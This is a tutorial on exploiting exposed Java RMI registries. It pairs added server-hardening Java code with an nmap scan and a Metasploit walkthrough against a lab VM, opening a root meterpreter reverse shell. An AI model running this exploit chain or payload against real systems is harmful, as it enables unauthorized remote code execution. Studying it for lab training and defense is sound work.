Exploiting Java RMI (ports 1099/1090 exposed externally, RCE)
Introduction to Java RMI
Java RMI stands for Remote Method Invocation. It is a mechanism that lets an object running in one Java virtual machine invoke methods on an object in another Java virtual machine.
RMI is part of J2SE and lets programmers build distributed applications in Java. An RMI object is a remote Java object whose methods can be invoked from another JVM, even across a network, in the same way as the methods of a local Java object, so objects spread across different JVMs look and behave like local objects.
For any RMI interface that takes an object as a parameter, you can send an object of your own construction and force the server to deserialize it as any serializable class present on its class path.
RMI transport is based entirely on deserialization. The default registry port is 1099.
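The two paragraphs above describe the core risk: every RMI call carries serialized objects that the server deserializes, and an exposed registry lets anyone send them. The Java program below is an added example, not part of the original post and not code from any project it mentions; it shows the corresponding server-side mitigations: binding the registry and the exported object to loopback only, refusing client-supplied codebases, and installing a JEP 290 deserialization allowlist so that an argument of an unexpected class is rejected before it is instantiated. The `Greeter` interface, the `HardenedRmiServer` class name and the filter pattern are assumptions made for this example; the pattern must list whatever argument types your own remote interfaces actually use.

```java
import java.io.IOException;
import java.io.ObjectInputFilter;
import java.net.InetAddress;
import java.net.ServerSocket;
import java.rmi.Remote;
import java.rmi.RemoteException;
import java.rmi.registry.LocateRegistry;
import java.rmi.registry.Registry;
import java.rmi.server.RMIServerSocketFactory;
import java.rmi.server.UnicastRemoteObject;

/**
 * Hypothetical hardened RMI service (added example, not from the original post).
 * Every RMI call deserializes its arguments, so the service (a) restricts what
 * may be deserialized and (b) does not listen on all interfaces.
 * Requires Java 9 or later for ObjectInputFilter.
 */
public class HardenedRmiServer {

    /** Hypothetical remote interface; only a String crosses the wire. */
    public interface Greeter extends Remote {
        String greet(String name) throws RemoteException;
    }

    /** Server-socket factory that binds to the loopback address only. */
    static final RMIServerSocketFactory LOOPBACK_ONLY = new RMIServerSocketFactory() {
        @Override
        public ServerSocket createServerSocket(int port) throws IOException {
            return new ServerSocket(port, 50, InetAddress.getLoopbackAddress());
        }
    };

    public static void main(String[] args) throws Exception {
        // Never load classes from a codebase URL annotated by the caller.
        // This has been the JDK default since 7u21; set it explicitly so a
        // stray -D flag on the command line cannot reopen it.
        System.setProperty("java.rmi.server.useCodebaseOnly", "true");

        // Stubs handed to clients advertise this host; keep it on loopback.
        System.setProperty("java.rmi.server.hostname", "127.0.0.1");

        // JEP 290 process-wide deserialization filter. Only the types the
        // application's remote methods legitimately take are allowed; "!*"
        // rejects every other class with an InvalidClassException before any
        // constructor or readObject method runs. The depth and array limits
        // bound memory use from crafted streams. The filter can be set only
        // once per JVM; -Djdk.serialFilter=... is the configuration-only
        // equivalent.
        ObjectInputFilter filter = ObjectInputFilter.Config.createFilter(
                "maxdepth=8;maxarray=4096;"
              + "java.lang.String;java.lang.Integer;"
              + "!*");
        ObjectInputFilter.Config.setSerialFilter(filter);

        // Registry and exported object both listen on 127.0.0.1 only.
        // Registry operations (bind/lookup) are additionally covered by the
        // JDK's built-in registry filter since Java 9.
        Registry registry = LocateRegistry.createRegistry(
                Registry.REGISTRY_PORT, null, LOOPBACK_ONLY);

        Greeter impl = name -> "hello " + name;
        Greeter stub = (Greeter) UnicastRemoteObject.exportObject(
                impl, 0, null, LOOPBACK_ONLY);
        registry.rebind("greeter", stub);   // local call: no serialization here

        System.out.println("RMI registry bound to 127.0.0.1:" + Registry.REGISTRY_PORT
                + " with serial filter " + filter);
        Thread.currentThread().join();      // keep serving until the process is killed
    }
}
```

Compile and run with `javac HardenedRmiServer.java && java HardenedRmiServer` on Java 9 or later. A scan like the nmap command in the next section, run from another host, then finds nothing on 1099, and a client on the same machine whose call argument is of any class outside the allowlist has the call rejected with an `InvalidClassException` on the server, which the client sees as a `RemoteException`.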
Probing the target's RMI service
Use nmap -sV -p 1099 <target IP> to fingerprint the service version on the target.
➜ ~ nmap -sV -p 1099 10.0.2.5
Starting Nmap 7.70 ( https://nmap.org ) at 2019-07-13 09:49 EDT
Nmap scan report for 10.0.2.5
Host is up (0.00034s latency).
PORT STATE SERVICE VERSION
1099/tcp open Java-rmi Java RMI Registry
MAC Address: 08:00:27:87:7B:B0 (Oracle VirtualBox virtual NIC)
Service Info: Host: localhost
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.86 seconds
RMI remote command execution: exploitation method one
Exploit the RMI RCE vulnerability with Metasploit.
1. Start msfconsole
➜ ~ msfconsole
[-] ***rting the Metasploit Framework console.../
[-] * WARNING: No database support: No database YAML file
[-] ***
IIIIII dTb.dTb _.---._
II 4' v 'B .'"".'/|\`.""'.
II 6. .P : .' / | \ `. :
II 'T;. .;P' '.' / | \ `.'
II 'T; ;P' `. / | \ .'
IIIIII 'YvP' `-.__|__.-'
I love shells --egypt
=[ metasploit v5.0.2-dev ]
+ -- --=[ 1852 exploits - 1046 auxiliary - 325 post ]
+ -- --=[ 541 payloads - 44 encoders - 10 nops ]
+ -- --=[ 2 evasion ]
+ -- --=[ ** This is Metasploit 5 development branch ** ]
2. Use the exploit/multi/misc/java_rmi_server module
msf5 > use exploit/multi/misc/java_rmi_server
msf5 exploit(multi/misc/java_rmi_server) > set rhosts 10.0.2.5
rhosts => 10.0.2.5
3. Set the payload
msf5 exploit(multi/misc/java_rmi_server) > set payload java/meterpreter/reverse_tcp
payload => java/meterpreter/reverse_tcp
msf5 exploit(multi/misc/java_rmi_server) > set lhost 10.0.2.12
lhost => 10.0.2.12
4. Check the configuration
msf5 exploit(multi/misc/java_rmi_server) > show options
Module options (exploit/multi/misc/java_rmi_server):
Name Current Setting Required Description
---- --------------- -------- -----------
HTTPDELAY 10 yes Time that the HTTP Server will wait for the payload request
RHOSTS 10.0.2.5 yes The target address range or CIDR identifier
RPORT 1099 yes The target port (TCP)
SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
URIPATH no The URI to use for this exploit (default is random)
Payload options (java/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 10.0.2.12 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Generic (Java Payload)
5. Run the exploit
msf5 exploit(multi/misc/java_rmi_server) > run
[*] Started reverse TCP handler on 10.0.2.12:4444
[*] 10.0.2.5:1099 - Using URL: http://0.0.0.0:8080/RTcs5fWbAmO91i
[*] 10.0.2.5:1099 - Local IP: http://192.168.1.34:8080/RTcs5fWbAmO91i
[*] 10.0.2.5:1099 - Server started.
[*] 10.0.2.5:1099 - Sending RMI Header...
[*] 10.0.2.5:1099 - Sending RMI Call...
[*] 10.0.2.5:1099 - Replied to request for payload JAR
[*] Sending stage (53845 bytes) to 10.0.2.5
[*] Meterpreter session 1 opened (10.0.2.12:4444 -> 10.0.2.5:35676) at 2019-07-13 09:54:48 -0400
id
[-] 10.0.2.5:1099 - Exploit failed: RuntimeError Timeout HTTPDELAY expired and the HTTP Server didn't get a payload request
[*] 10.0.2.5:1099 - Server stopped.
[*] Exploit completed, but no session was created.
msf5 exploit(multi/misc/java_rmi_server) > sessions -l
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter java/linux root @ metasploitable 10.0.2.12:4444 -> 10.0.2.5:35676 (10.0.2.5)
msf5 exploit(multi/misc/java_rmi_server) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > sysinfo
Computer : metasploitable
OS : Linux 2.6.24-16-server (i386)
Meterpreter : java/linux
RMI remote command execution: exploitation method two
Download the tool attackRMI.jar directly
GitHub address
A-D-Team/attackRmi (github.com)